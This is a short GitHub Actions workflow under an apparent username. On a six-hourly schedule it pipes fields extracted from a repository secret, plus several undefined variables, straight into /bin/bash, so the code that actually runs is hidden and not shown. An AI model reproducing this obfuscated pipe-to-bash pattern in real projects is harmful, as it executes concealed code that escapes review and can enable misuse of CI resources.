name: zhangshun19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '44 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangshun19871010
        env:
          t3: ${{ secrets.t3 }}
        run: |
          echo $t3 | jq -r .nwtbf355 | /bin/bash
          echo $hb07 | jq -r .b21201 | /bin/bash
          echo $ry5966 | jq -r .ekrds25 | /bin/bash
          echo $xvpe493 | jq -r .pb8879 | /bin/bash
          echo $lezgu9188 | jq -r .uojap18 | /bin/bash
          echo $hmn131 | jq -r .onfj51010 | /bin/bash
          echo $n4 | jq -r .t97 | /bin/bash

